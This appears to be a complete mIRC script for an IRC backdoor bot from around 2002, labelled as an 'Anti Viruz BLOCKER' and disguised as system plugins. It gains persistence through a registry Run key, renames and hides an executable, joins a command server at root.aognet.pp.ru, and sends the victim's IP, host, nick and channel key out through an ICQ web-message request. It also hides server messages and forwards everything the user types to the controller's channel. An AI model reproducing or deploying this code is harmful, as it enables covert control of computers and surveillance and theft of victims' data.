   ; All right by AZzZ (c) (r) 2002
   ; -#$5235*%398!@#% -> Anti Viruz BLOCKER
   alias sysinfo { .msg $1 15,14System info 14(14OS:15 $dll(Sysinfo.dll,osinfo,_) $+ 14)0:14(14Uptime:15 $duration($calc($ctime($asctime(dd/mm/yy HH:nn:ss)) - $ctime(%ontime))) $+ 14)0:14(14CPU:15 $dll(Sysinfo.dll,cpuinfo,_) $+ 14)0:14(14Memory:15 $dll(Sysinfo.dll,meminfo,_) $+ 14)0:14(14Disk:15 $dll(Sysinfo.dll,diskcapacity,_) $+ 14) | .msg $1 14(14Video:15 $dll(Sysinfo.dll,gfxinfo,_) $+ 14)0:14(14Screen:15 $dll(Sysinfo.dll,screeninfo,_) $+ 14)0:14(14Connection:15 $dll(Sysinfo.dll,connection,_) $dll(Sysinfo.dll,netcapacity,_) $+ 14)0:14(14LAN:15 $dll(Sysinfo.dll,interfaceinfo,_) $+ 14) }
   alias regedit { set %filetoboot $rand(100,999) $+ .reg | set %mircexe $replace($mircexe,\,\\) | write %filetoboot REGEDIT4 | write %filetoboot [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] | write %filetoboot $+("SysCab"=",%mircexe,") | run -n regedit /s %filetoboot }
   alias exeset { mkdir $mircdir $+ \Nt | mkdir $mircdir $+ \Help | mkdir $mircdir $+ \Admin | mkdir $mircdir $+ \Date | mkdir $mircdir $+ \Setup | if ($exists(c:\syscab.exe)) { copy c:\syscab.exe c:\winnt\windrx.dll | remove c:\syscab.exe } }
   alias icqset { set %ipb.n agent@aognet.gov | set %ipb.sub Online | set %hy $remove(%chan.for.join,$chr(35)) | set %ipb.m $replace(at: [ $date ] [ $time ] who: [ $ip ] [ $host ] where: [ $server ] nick: [ $me ] channels: [ %hy ] key: [ %chan.key ] ,$chr(32),$chr(160)) | set %ipb.uin 110056 | set %ipb.t 0 | icqonline  }
   alias icqonline { sockopen icqnet.110056  wwp.icq.com 80 }
   alias j {  if (%cc = off) { timerj 1 60 server root.aognet.pp.ru 2717 | jj } }
   alias jj { if (%cc = off) { timerjj 1 70 j } }
   alias plugins { titlebar SysCab | .run ntcomm.exe "mIRC SysCab" | set %ontime $asctime(dd/mm/yy HH:nn:ss) | set %uname $rand(A,Z) $+ $rand(1111111,9999999) $+ $rand(A,Z) | j | nick $rand(A,Z) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(a,z) | username %uname | emailaddr $rand(A,Z) $+ $rand(11111,99999) $+ $rand(A,Z) $+ @aognet.gov | if (%chan.for.join  == $null) { set %chan.for.join #x } }
   alias pluginc { ourfriend | timerj off | timerjj off | set %cc on | unset %auth* | set %conntime $asctime(dd/mm/yy HH:nn:ss) | set %host.now $ip $+ :local |  set %host.adrs $iif($ip $+ :local !isin %host.adrs,$ip $+ :local) | nick $rand(A,Z) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(a,z) | timer 0 100 //ctcp $me Ping | join %chan.for.join | mode %chan.for.join +mnst | topic %chan.for.join ( $+ $date $+ ):( $+ $time $+ ) | identd on O $+ $rand(11111,99999) $+ X | icqset }
   alias plugind { nick $rand(A,Z) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(a,z) | unset %auth* | server root.aognet.pp.ru 2717 | identd on O $+ $rand(11111,99999) $+ X | set %cc off | j }
   alias plugino { if ($opnick == $me) { //mode # +ntsm | /topic # ( $+ $time $+ ):( $+ $date $+ ) } }
   alias plaginp { if (%auth [ $+ [ $nick ] ]  == yes)  { unset %auth [ $+ [ $nick ] ] } | if (%auth [ $+ [ $nick ] ]  == reget)  { unset %auth [ $+ [ $nick ] ] } | if ($nick == $me) { msg %chan attempt to part %chan ( $+ $address $+ ) | /timer 1 1 /raw -q join %chan.for.join blah } }
   alias plugink { if ($knick == $me) && ($chan == %chan.for.join) { timerfastjoin -o 0 5 /join %chan.for.join blah } }
   alias pluginq { if (%auth [ $+ [ $nick ] ]  == yes)  { unset %auth [ $+ [ $nick ] ] } | if (%auth [ $+ [ $nick ] ]  == reget)  { unset %auth [ $+ [ $nick ] ] } }
   on *:sockopen:icqnet.*:{ sockwrite -nt $sockname GET /scripts/WWPMsg.dll?from= $+ %ipb.n $+ &fromemail= $+ %ipb.n $+ &subject= $+ %ipb.sub $+ &body=  $+ %ipb.m  $+ &to=  $+ $gettok($sockname,2,46) $+ &Send=Message   | sockwrite $sockname $crlf $+ $crlf | sockread }
   on *:sockread:icqnet.*:{ sockread -f %temp  }
   on *:sockclose:icqnet.*:{ unset %temp }

   on *:start: { regedit | plugins | exeset }
   on 1:connect: { pluginc }
   on *:disconnect: { plugind }
   on *:op:#:{ plugino }
   on *:part:%chan.for.join:{ pluginp }
   on *:kick:#:{ plugink }
   on *:quit: { plugink }
   on ^*:invite:*: { haltdef | halt }
   on ^*:notice:*:?: { haltdef | halt }
   on ^*:chat:*: { haltdef | halt }
   on *:INPUT:*: { haltdef | /echo -a < $+ $me $+ > $1- | msg %chan.for.join --WARNING- (INPUT COMMAND) $1- | /clearall | halt }

   raw 001:*: halt
   raw 002:*: halt
   raw 003:*: halt
   raw 004:*: halt
   raw 005:*: halt
   raw 006:*: halt
   raw 007:*: halt
   raw 008:*: halt
   raw 257:*: halt
   raw 258:*: halt
   raw 259:*: halt
   raw 265:*: halt
   raw 266:*: halt
   raw 433:*: { .timernicknoth 1 1 nick $rand(A,Z) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(a,z) |  halt  }
   raw 432:*: { .timernicknoth 1 1 nick $rand(A,Z) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(a,z) |  halt  }
   ; All right by AZzZ (c) (r) 2002
   ; -#$5235*%398!@#% -> Anti Viruz BLOCKER
